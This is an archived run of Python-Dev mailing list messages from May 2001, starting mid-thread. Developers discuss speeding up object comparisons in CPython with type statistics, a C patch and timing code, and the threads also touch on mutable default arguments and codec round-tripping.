SRE_Pattern 210 List 122 Instance 4 Float 1 Instance method 1 Roughly the same picture: 97% calls with equally-typed objects, of those 62% strings, 3% integers. Notice the 15% for tuples and types, each. So to speed-up the common case clearly means to speed-up string comparisons. If I'd need to optimize anything else afterwards, I'd look into type objects - most likely, they are compared for EQ, which can be done nicely and directly in a tp_richcompare also. Those two optimizations together would give a richcompare to 95% of the objects in the IDLE case. Regards, Martin From guido at digicool.com Wed May 16 00:41:12 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 17:41:12 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200." <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com> I'm curious where the frequent comparisons of types come from. Is there lots of code that does frequent assert type(x) == T typechecking? Does isinstance(x, T) perhaps use EQ? --Guido van Rossum (home page: http://www.python.org/~guido/) From barry at digicool.com Tue May 15 23:51:00 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Tue, 15 May 2001 17:51:00 -0400 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> Message-ID: <15105.42180.401918.223487@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> I'm curious where the frequent comparisons of types come GvR> from. GvR> Is there lots of code that does frequent GvR> assert type(x) == T GvR> typechecking? GvR> Does isinstance(x, T) perhaps use EQ? Not to mention the several hundred comparisons to None. From jeremy at digicool.com Tue May 15 19:26:54 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 15 May 2001 13:26:54 -0400 (EDT) Subject: [Python-Dev] Comparison speed In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> Message-ID: <15105.26334.610144.846269@slothrop.digicool.com> I only learned recently that isinstance() can be called with types instead of classes. I suppose the name lead me in the wrong direction. I had the silly idea that it only applied to instances <0.1 wink>. So it comes as little surprise to me that there is a lot of code executed in, e.g., the test suite that does comparisons on types. In the Lib directory, there are 63 files that use == and the builtin type function. (Simple grep.) A total of 139 instances of this idiom. A cursory scan suggests that most of the call are things like type(obj) == type(''). In the Zope source tree, there are 58 files and 98 individual occurrences. It again looks like comparisons against string type is the most common. I can think of two common cases where an object is checked against the string type. One is an interface that takes a file-like object or its path. The other is an interface that takes a sequence, but doesn't want to try a string as a sequence. Sounds like we ought to do a search-and-destroy on type comparisons, replacing with isinstance() where possible. Jeremy From jeremy at digicool.com Tue May 15 19:41:58 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 15 May 2001 13:41:58 -0400 (EDT) Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online In-Reply-To: <20010515115120.A14357@glacier.fnational.com> References: <000901c0dd6b$cdb5d960$e46940d5@hagrid> <20010515115120.A14357@glacier.fnational.com> Message-ID: <15105.27238.582785.851371@slothrop.digicool.com> I download one of the files, but the quicktime player I have on my Windows box said it didn't understand the file format. I eventually got the streaming version at the 100kbps to "work" where work meant mostly an audio feed and occasional stills that were recognizable. Jeremy PS It was cool to watch the one on compilation. Mat Hostetter, one of the panelists, is my old roommate! From barry at digicool.com Wed May 16 00:56:10 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Tue, 15 May 2001 18:56:10 -0400 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> Message-ID: <15105.46090.203278.397835@anthem.wooz.org> >>>>> "JH" == Jeremy Hylton writes: JH> I only learned recently that isinstance() can be called with JH> types instead of classes. I suppose the name lead me in the JH> wrong direction. I had the silly idea that it only applied to JH> instances <0.1 wink>. JH> So it comes as little surprise to me that there is a lot of JH> code executed in, e.g., the test suite that does comparisons JH> on types. JH> In the Lib directory, there are 63 files that use == and the JH> builtin type function. (Simple grep.) A total of 139 JH> instances of this idiom. A cursory scan suggests that most of JH> the call are things like type(obj) == type(''). Even without the forward-looking insight that types are classes , I think type comparisions should have been done with `is' and not ==. So old school type comparisons should have been done as type(obj) is StringType whereas new school type comparisons should be done as isinstance(obj, StringType) With Python 2.1 == is naturally, slower than `is', but isinstance() comes in somewhere in the middle. 563897.802881 is comparisons per second 506827.201066 == comparisons per second 520696.916088 isinstance() comparisons per second -Barry -------------------- snip snip -------------------- from types import StringType import time r = range(1000000) def one(r=r): x = 'hello' t0 = time.time() for i in r: type(x) is StringType t1 = time.time() - t0 print len(r) / t1, 'is comparisons per second' def two(r=r): x = 'hello' t0 = time.time() for i in r: type(x) == StringType t1 = time.time() - t0 print len(r) / t1, '== comparisons per second' def three(r=r): x = 'hello' t0 = time.time() for i in r: isinstance(x, StringType) t1 = time.time() - t0 print len(r) / t1, 'isinstance() comparisons per second' one() two() three() From tim.one at home.com Wed May 16 01:49:03 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 19:49:03 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> Message-ID: Making the 5am email concrete, this is what I meant: Index: object.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v retrieving revision 2.131 diff -c -r2.131 object.c *** object.c 2001/05/11 03:36:45 2.131 --- object.c 2001/05/15 23:39:24 *************** *** 835,841 **** } } else { ! res = do_richcmp(v, w, op); } compare_nesting--; return res; --- 835,863 ---- } } else { ! cmpfunc f; ! if (v->ob_type == w->ob_type ! && RICHCOMPARE(v->ob_type) == NULL ! && (f = v->ob_type->tp_compare) != NULL) ! { ! int c = (*f)(v, w); ! if (c < 0 && PyErr_Occurred()) ! res = NULL; ! else { ! switch (op) { ! case Py_LT: c = c < 0; break; ! case Py_LE: c = c <= 0; break; ! case Py_EQ: c = c == 0; break; ! case Py_NE: c = c != 0; break; ! case Py_GT: c = c > 0; break; ! case Py_GE: c = c >= 0; break; ! } ! res = c ? Py_True : Py_False; ! Py_INCREF(res); ! } ! } ! else ! res = do_richcmp(v, w, op); } compare_nesting--; return res; That's a local change to PyObject_RichCompare, taking a fast path for most scalar types (which don't have richcmps but do have tp_compare today). On my Win98 box reproducible timings are impossible, but it obviously chops out layers and layers of function calls and redundant tests when it triggers. That appears to be more often than not across all apps I've tried, from 60% of PyObject_RichCompare calls to nearly 100%. From tim.one at home.com Wed May 16 02:01:05 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 20:01:05 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com> Message-ID: [Tim] > BUG ALERT: The tuple (and list) richcmp algorithm is arguably wrong, > because it won't believe there's any difference unless Py_EQ > returns false for some corresponding elements: > > >>> class C: > ... def __lt__(x, y): return 1 > ... __eq__ = __lt__ > ... > >>> C() < C() > 1 > >>> (C(),) < (C(),) > 0 > >>> > > That doesn't make sense -- provided you believe the defn. of C > makes sense. [Guido] > I think in this example the problem is with C, not with the tuple > algorithm. I can live with that. > The question is, what are you going to do otherwise? You > could test for < first, == second -- but that means twice as many > comparisons, and for reasonably-behaved items it makes no difference > at all. The question remaining is how much of this list/tuple richcmp behavior is guaranteed by the language and how much is just implementation-dependent fuzz. For a more vanilla example, I removed the EQ/NE "lengths differ?" tuple richcmp early-exit test because I never found code that made it trigger. (but tons of code that gets there without triggering). But this has semantic implications too: an implementation without the early exit may call user-defined comparison routines that raise exceptions when comparing tuples of different lengths now. Do you care? (I don't.) From tim.one at home.com Wed May 16 02:37:56 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 20:37:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > I'd like to add another data point, answering the question what types > are most frequently compared. That varies wildly by app. I have apps where int compares *overwhelmingly* dominate, others where float compares do, many where strings compares do, and the last code I wrote for Zope spends most of its (very substantial) time doing lookups of "object ids" in dicts. In Python terms, those are Pythong lon (unbounded) ints today, and potentially Python ints on 64-bit boxes, and that's another case where ceval.c's special-casing of int compares is impotent. Heck, sort a large homogeneous array once, and whatever element type that array has will likely dominate comparisons for the whole app! That's why I'm so keen to chop out a half dozen layers of blubber for *all* types that don't play the richcmp game (which today includes every type I mentioned above). > The first set of data is for running the Python testsuite. > > riches 3040952 # Calls to PyType_RichCompare > eqs 2828345 # Calls where the types are equal > > String 2323122 > Float 141507 > Int 125187 > Type 99477 > Tuple 84503 > Long 30325 > Unicode 10782 > Instance 9335 > List 2997 > None 383 > Class 318 > Complex 219 > Dict 57 > Array 49 > WeakRef 34 > Function 11 > File 11 > SRE_Pattern 10 > CFunction 9 > Lock 8 > Module 1 > > So strings cover 82% of all the compare calls of equally-typed > objects, followed by floats with 5%. Those calls together cover 93% of > the richcompare calls. > > Since this might give a blurred view of what is actually used in > applications, Note that the top 4 types don't have a tp_richcompare slot today. The tuples are likely composed of simple scalar types, and the latter benefit too. But as above, we can't say anything in advance about the *specific* types a given app is going to compare most often. There is no "typical app" in that respect. > I ran the PyXML testsuite with that python binary > also. Leaving out types that are not used, I get > > riches 88465 > eqs 59279 > > String 48097 > Int 5681 > Type 3170 > Tuple 760 > List 492 > Float 332 > Instance 269 > Unicode 243 > None 225 > SRE_Pattern 4 > Long 3 > Complex 3 > > The first observation here is that "only" 67% of the calls are with > equally-typed objects. Someone who cares about the speed of PyXML would be well advised to figure out why <0.9 wink>: there's no scheme on the horizon that will speed mixed-type comparisons one whit. > Of those, 80% are with strings, 9% with integers. XML is a string-crunching app, right? > The last example is idle, where I just did an "import httplib", for > fun. > > riches 50923 > eqs 49882 > > String 31198 > Tuple 8312 > Type 7978 > Int 1456 > None 600 > SRE_Pattern 210 > List 122 > Instance 4 > Float 1 > Instance method 1 > > Roughly the same picture: 97% calls with equally-typed objects, of > those 62% strings, 3% integers. Notice the 15% for tuples and types, > each. Surprising! > So to speed-up the common case clearly means to speed-up string > comparisons. The only thing the apps I've tried have in common is that the types compared most often do have tp_compare but not tp_richcompare functions. The test suite, XML and IDLE are all heavy string-slingers. > If I'd need to optimize anything else afterwards, I'd look into type > objects - most likely, they are compared for EQ, which can be done > nicely and directly in a tp_richcompare also. Would do just as well to give them a one-liner tp_compare function (in conjunction with the posted patch). > Those two optimizations together would give a richcompare to 95% of > the objects in the IDLE case. Since that's the exact opposite of what I want to do, it's at least interesting . Whatever, there needs to be a (very) fast path, and it needs to pick on something that all common types implement, including at least strings, ints, longs, floats and-- I guess --type objects. I don't know about other people, but I have lots of code that uses the cmp() function heavily. That path has also gotten bloated, and tries each of Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them to say "yes". It does this now even if the tp_compare slot is defined. The only thing that's saving cmp()-slinging code from major sloth now is that the basic types do *not* implement tp_richcompare, so try_rich_to_3way_compare gets out early (before doing the three-way Py_EQ etc dance). But give the basic scalar types richcmp functions, and cmp() will slow down a lot (unless more hacks are added to stop that). From greg at cosc.canterbury.ac.nz Wed May 16 03:58:05 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 16 May 2001 13:58:05 +1200 (NZST) Subject: [Python-Dev] Comparison speed In-Reply-To: Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz> Tim Peters : > In Python terms, those are Pythong lon (unbounded) ints today ^^^^^^^ What Pythonistas wear on their feet? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From esr at thyrsus.com Wed May 16 04:27:38 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Tue, 15 May 2001 22:27:38 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200 References: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz> Message-ID: <20010515222738.A9996@thyrsus.com> Greg Ewing : > Tim Peters : > > > In Python terms, those are Pythong lon (unbounded) ints today > ^^^^^^^ > What Pythonistas wear on their feet? No, man. It's what sexy lady Pythonistas wear on the beach in Rio. (Yes, I know some sexy lady Pythonistas. No, you can't have their phone numbers. Pthfthfthpht...) -- Eric S. Raymond Question with boldness even the existence of a God; because, if there be one, he must more approve the homage of reason, than that of blindfolded fear.... Do not be frightened from this inquiry from any fear of its consequences. If it ends in the belief that there is no God, you will find incitements to virtue in the comfort and pleasantness you feel in its exercise... -- Thomas Jefferson, in a 1787 letter to his nephew From tim.one at home.com Wed May 16 09:14:25 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 03:14:25 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3B00E98E.1C44FF5@lemburg.com> Message-ID: [MAL] > Round-tripping is obviously very important if you use Unicode > as basis for working on text. Since I use 7-bit ASCII exclusively, I've been using encode = decode = lambda x: x I haven't proved that's round-trippable, but haven't bumped into an exception yet. > I don't know about the reasoning behind making cp875 fail the > round-trip -- Unicode certainly provides means to make mappings > round-trip safe (e.g. by reverting to the private Unicode > char. point areas). Then I ignorantly but confidently (indeed, with the cheery confidence only the truly ignorant can truly enjoy!) vote for your approach that maps the non-round-trippable cp875 code points to None. Better safe than sorry, by default. Else 6 of the 7 ambiguous chars will be silent surprises by default. From tim.one at home.com Wed May 16 09:25:28 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 03:25:28 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151527.KAA28734@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > PEP 207 is quite explicit that == and != are not to be assumed each > other's complement. It is silent on the x==x issue but the PEP > mentions IEEE 754 so I agree that this also shouldn't be cut short. It's explicit about x==x too: (Note: Python currently assumes that x==x is always true and x!=x is never true; this should not be assumed.) That's from the end of point #4, under "Proposed Resolutions". I agreed then, and still do . From martin at loewis.home.cs.tu-berlin.de Wed May 16 09:28:45 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 09:28:45 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT)) References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> > Sounds like we ought to do a search-and-destroy on type comparisons, > replacing with isinstance() where possible. At least in my applications, this is unfortunately not possible: I want a test for byte-string-or-unicode-string. This could be done with two isinstance calls, but that is certainly less efficient. Marc-Andre once proposed a type representing the immediate supertype of both byte strings and unicode strings; let's call it abstract string. Then I could write isinstance(e, types.AbstractString). Regards, Martin From martin at loewis.home.cs.tu-berlin.de Wed May 16 09:24:56 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 09:24:56 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com) References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.42180.401918.223487@anthem.wooz.org> Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de> > GvR> I'm curious where the frequent comparisons of types come > GvR> from. > > Not to mention the several hundred comparisons to None. This is harder to analyse; I set a gdb breakpoint on the place where RichCompare gets PyType_Type, then tried to see what it does, then ignoring the breakpoint a few times. This is what I've found; I may miss important cases. In PyXML, the expression type(e) in [types.StringType, types.UnicodeType] is frequently computed. This is a sequence_contains, which in turn does two Py_EQ tests. In addition, compile.c:com_add has t = Py_BuildValue("(OO)", v, v->ob_type) PyDict_GetItem(dict, t) Again, the dictionary lookup performs Py_EQ on the tuples, which does Py_EQ on the elements. This also accounts for the RichCompare calls which receive None: v may be None, here, so t is (None, type(None)). In IDLE, the situation is similar. com_add produces many compares with types. In addition, sre.compile has type(s) in sre_compile.STRING_TYPES which is the same test as the PyXML one. Finally, there is a type-in-typetuple test inside Tkinter._cnfmerge. Regards, Martin From i_sofer at yahoo.com Wed May 16 09:53:25 2001 From: i_sofer at yahoo.com (Idan Sofer) Date: 16 May 2001 10:53:25 +0300 Subject: [Python-Dev] Bug report: empty dictionary as default class argument Message-ID: <200105160756.KAA29616@alpha.netvision.net.il> Hello. I have found a rather annoying bug in Python, present in both Python 1.5 and Python 2.0. If a class has an argument with a default of an empty dictionary, then all instances of the same class will point to the same dictionary, unless the dictionary is explictly defined by the constructor. I attach a piece of code that demostrates the problem -------------- next part -------------- A non-text attachment was scrubbed... Name: test.py Type: text/x-python Size: 1197 bytes Desc: not available URL: From martin at loewis.home.cs.tu-berlin.de Wed May 16 10:02:01 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 10:02:01 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de> > Since that's the exact opposite of what I want to do, it's at least > interesting . I'll put a patch on SF soon which does what you want to do, i.e. tries tp_compare as the first thing if tp_richcompare is not there. Even with this patch, your code is faster if strings have a richcompare. Without richcompare, I get 0.720 0.720 0.720 0.730 0.720 0.720 0.730 0.720 0.720 0.730 With it, I get 0.710 0.720 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720 Given that stock CVS python is in the 0.78 range, the different is neglectable, though. Regards, Martin From larsga at garshol.priv.no Wed May 16 10:19:10 2001 From: larsga at garshol.priv.no (Lars Marius Garshol) Date: 16 May 2001 10:19:10 +0200 Subject: [Python-Dev] Bug report: empty dictionary as default class argument In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il> References: <200105160756.KAA29616@alpha.netvision.net.il> Message-ID: * Idan Sofer | | If a class has an argument with a default of an empty dictionary, | then all instances of the same class will point to the same | dictionary, unless the dictionary is explictly defined by the | constructor. This is part of the language semantics, and so not a bug. The default values of optional arguments are evaluated when the function/method is compiled. You may consider the semantics ill-advised, but it is intentional. | class foo: | | def __init__(self,attribs={}): | self.attribs=attribs; | return None; I usually write this as: class Foo: def __init__(self, attribs = None): self.attribs = attribs or {} --Lars M. From fredrik at pythonware.com Wed May 16 10:18:44 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 16 May 2001 10:18:44 +0200 Subject: [Python-Dev] Bug report: empty dictionary as default class argument References: <200105160756.KAA29616@alpha.netvision.net.il> Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff> Idan Sofer wrote: > > I have found a rather annoying bug in Python, present in both Python 1.5 > and Python 2.0. > > If a class has an argument with a default of an empty dictionary, then > all instances of the same class will point to the same dictionary, > unless the dictionary is explictly defined by the constructor. maybe you should check the documentation (or the FAQ) before submitting bugs? http://www.python.org/doc/current/ref/function.html Default parameter values are evaluated when the function definition is executed. This means that the expression is evaluated once, when the function is defined, and that that same ``pre- computed'' value is used for each call. This is especially important to understand when a default parameter is a mutable object, such as a list or a dictionary: if the function modifies the object (e.g. by appending an item to a list), the default value is in effect modified. Cheers /F PS. when you do report real bugs, please use the bug tracker: http://sourceforge.net/tracker/?group_id=5470&atid=105470 "is this a bug" questions should be sent to comp.lang.python From tim.one at home.com Wed May 16 10:41:47 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:41:47 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> Message-ID: [Martin] > Producing numbers is easy :-) If only making sense of them were too <0.6 wink>. > I've instrumented my version where string implements richcmp, and > special-cases everything I can think of. 1. String objects are also equal despite being different objects, if their ob_sinterned pointers are equal and non-NULL. So if you're looking for every trick in & out of the book, that's another one. 2. But the real goal is to add only those special cases that in combination yield the largest net win, and that's much harder to determine (since there are no typical apps, and it's very hard to quantify the tradeoffs here in a credible x-platform x-app way). > Counting is done for running the test suite. With this, I get > > Calls to string_richcompare: 2378660 > Calls with different types: 33992 (ie. one is not a string) > Calls with identical strings: 120517 > Calls where lens decide !EQ: 1775716 > ---------------------------- > Calls richcmp -> oldcomp: 448435 > Total calls to oldcomp: 1225643 > Calls oldcomp -> memcmp: 860174 > > So 5% of the calls are with identical strings, for which I can > immediately decide the outcome. But also at the cost of doing a fruitless compare and branch in 95% of calls. There isn't enough data to guess whether this is a net win or a net loss (compared to leaving this special case out). Note that if the "identical string pointers" special case is a net win, it would be effective inside oldcomp instead (i.e., you don't need a richcompare slot to exploit it); indeed, it may be more effective there, since there are some 800,000 calls to oldcmp that *didn't* come from richcmp, and oldcmp doesn't check for pointer equality now (but PyObject_Compare does, so there didn't *used* to be any point to it in oldcmp). Any idea where those 800,000 virgin calls to oldcomp are coming from? That's a lot. > 75% can be decided in terms of the string lengths, which leaves ca. 19% > for cases where lexicographical comparison is needed. So about 1 in 5 times there's also the additional (wrt just calling oldcmp all the time) overhead of a second function call (i.e., the call to oldcmp made by richcmp). > In those cases, the first byte decides in 30%. If I remove the test > for "len decides !EQ", I get > > #riches: 2358322 > #riches_ni: 34108 > #idents_decide: 102050 > #lens_decide: 0 > -------------------------------------- > rest(computed): 2222164 > #comps: 2949421 > #memcmps: 917776 > > So still, ca. 30% can be decided by first byte. Sorry, I couldn't follow this part, except noting that 917776 is about 30% of 2949421, in which case I would have expected you to say that 70% can be decided by first byte. > It still appears that the total number of calls to memcmp is higher > when the length is not taken into consideration. Since 917776 is larger than the earlier 860174, isn't that plain? BTW, some compilers inline memcmp, so assuming it's "a call" is a x-platform trap; of course assuming it *isn't* is also a x-platform trap. > To verify this claim, I've counted the cases where the length > decides the outcome, but looking at the first byte also had: > > lens_decide: 1784897 > lens_decide_firstbyte_wouldhave:1671148 > > So in 6% of the cases, checking the length alone gives a decision > which looking at the first byte doesn't; plus it saves a function > call. OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the *net* effect is muddy at best. > To support the thesis that Py_EQ is the common case for strings, I > counted the various operations: > > pyEQ:2271593 > pyLE:9234 > pyGE:0 > pyNE:20470 > pyLT:22765 > pyGT:578 This clearly wasn't doing much sorting of strings (or of tuples containing strings, etc) -- .sort() never uses pyEQ (it only uses pyLT). > Now, that might be flawed since comparing strings for equal is > extremely frequent in the testsuite. To give more credibility to the > data, I also ran setup.py with my instrumented ./python: In the absence of non-trivial use of sorting or the bisect module or one of the search tree modules out there, it's easy to buy that PyEQ is most common for strings. What's not clear is that adding a rich comparison slot actually helps overall (as compared to continuing to let string_compare() handle it, and if the pointer equality test actually saves more than it costs, adding it there instead). It's clearer that this is going to hurt sorting (& bisect etc), by adding yet another layer of function call to get Py_LT resolved (as for dict compares too, the string richcmp can't do anything to speed up Py_LT that string oldcmp can't do just as efficiently -- indeed, that's the great advantage oldcmp's "compare first character" test had: that *can* decide Py_LT in one byte much of the time (but length comparison cannot)). Note too earlier mail about how adding a richcmp slot to strings will suddenly slow cmp(string1, string2) (which is the usual way to program a search tree, because cmp() *used* to call a string comparison routine only once; but after adding a richcmp slot, each cmp(string1, string2) will call the richcmp slot from 1 thru 3 times (data-dependent)). > ... > That shows that optimizing for Py_NE is not worth it. With these data, > I'll upload a patch to SF. Which is here: http://sourceforge.net/tracker/index.php?func=detail&aid=424335& group_id=5470&atid=305470 Heh: let's grab all the ugly URLs off of SourceForge, stick them in a giant list, and sort them. Can't think of a more typical app than that . Thanks for the work, Martin! From tim.one at home.com Wed May 16 10:51:17 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:51:17 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org> Message-ID: [Barry A. Warsaw] > ... > from types import StringType > import time > r = range(1000000) > > def one(r=r): > x = 'hello' > t0 = time.time() > for i in r: Random clue: when you're too lazy to try to subtact out loop overhead (not a knock, I am too), you may have better luck with r = [1] * 1000000 than r = range(1000000) The reason is that the former way gets to keep incref'ing and decref'ing a single object (as it's repeatedly bound to "i" across iterations), instead of slobbering all over memory inc'ing and dec'ing a million distinct objects. there's-as-an-art-to-doing-nothing-quickly-ly y'rs - tim From tim.one at home.com Wed May 16 10:56:56 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:56:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <20010515222738.A9996@thyrsus.com> Message-ID: [poor Tim] > In Python terms, those are Pythong lon (unbounded) ints today ^^^^^^^ [Greg Ewing] > What Pythonistas wear on their feet? [Eric S. Raymond] > No, man. It's what sexy lady Pythonistas wear on the beach in Rio. Eric wins! That's indeed what I was thinking of. I'm surprised nobody asked what a lon was. But not as surprised that I didn't try to blame this on a Outlook 2000 bug. > (Yes, I know some sexy lady Pythonistas. No, you can't have their > phone numbers. Pthfthfthpht...) Too much work anyway. They can have mine: 703 758 8258. but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs - tim From esr at thyrsus.com Wed May 16 11:17:09 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 16 May 2001 05:17:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: ; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400 References: <20010515222738.A9996@thyrsus.com> Message-ID: <20010516051709.C11602@thyrsus.com> Tim Peters : > [poor Tim] > > In Python terms, those are Pythong lon (unbounded) ints today > ^^^^^^^ > [Greg Ewing] > > What Pythonistas wear on their feet? > > [Eric S. Raymond] > > No, man. It's what sexy lady Pythonistas wear on the beach in Rio. > > Eric wins! That's indeed what I was thinking of. I'm surprised nobody asked > what a lon was. But not as surprised that I didn't try to blame this on a > Outlook 2000 bug. > > > (Yes, I know some sexy lady Pythonistas. No, you can't have their > > phone numbers. Pthfthfthpht...) > > Too much work anyway. They can have mine: 703 758 8258. Hmmm...now, which one of them should I try to talk into a snakeskin bikini? Duh. Answer obvious: the one I can talk *out* of a snakeskin bikini most rapidly afterwards. Then I'll give her your number -- that is, if I don't get too, er, distracted. seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours, -- Eric S. Raymond Every Communist must grasp the truth, 'Political power grows out of the barrel of a gun.' -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment. From mal at lemburg.com Wed May 16 11:29:49 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 11:29:49 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3B02488D.415BA95F@lemburg.com> Tim Peters wrote: > > [MAL] > > Round-tripping is obviously very important if you use Unicode > > as basis for working on text. > > Since I use 7-bit ASCII exclusively, I've been using > > encode = decode = lambda x: x > > I haven't proved that's round-trippable, but haven't bumped into an exception > yet. For character map codecs the complete range(256) of possible input characters should pass the round-trip test, that is encoded text -> Unicode -> encoded text should result in the identiy mapping for all c in map(chr,range(256)). > > I don't know about the reasoning behind making cp875 fail the > > round-trip -- Unicode certainly provides means to make mappings > > round-trip safe (e.g. by reverting to the private Unicode > > char. point areas). > > Then I ignorantly but confidently (indeed, with the cheery confidence only > the truly ignorant can truly enjoy!) vote for your approach that maps the > non-round-trippable cp875 code points to None. Better safe than sorry, by > default. Else 6 of the 7 ambiguous chars will be silent surprises by > default. I will check in a patch which moves the building logic for encoding maps to codecs.py. This will simplify the task of choosing the "right" solution. Currently I'm in favour of: def make_encoding_map(decoding_map): """ Creates an encoding map from a decoding map. If a target mapping in the decoding map occurrs multiple times, then that target is mapped to None (undefined mapping), causing an exception when encountered by the charmap codec during translation. One example where this happens is cp875.py which decodes multiple character to \u001a. """ m = {} for k,v in decoding_map.items(): if not m.has_key(v): m[v] = k else: m[v] = None return m Perhaps we should also have a codecs.finalize_decoding_map() API in codecs.py which checks the decoding map and postprocesses it in case it finds a problem ?! -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Wed May 16 11:32:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 11:32:36 +0200 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> Message-ID: <3B024934.58232325@lemburg.com> "Martin v. Loewis" wrote: > > > Sounds like we ought to do a search-and-destroy on type comparisons, > > replacing with isinstance() where possible. > > At least in my applications, this is unfortunately not possible: I > want a test for byte-string-or-unicode-string. This could be done with > two isinstance calls, but that is certainly less efficient. > > Marc-Andre once proposed a type representing the immediate supertype > of both byte strings and unicode strings; let's call it abstract string. > Then I could write isinstance(e, types.AbstractString). I'm still holding on to that idea... hopefully, Guido's type checkins will make this possible in 2.2 or 2.3. The same should then be done for numbers, sequences and mappings (all abstract "types" defined in abstract.c). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Wed May 16 11:34:40 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 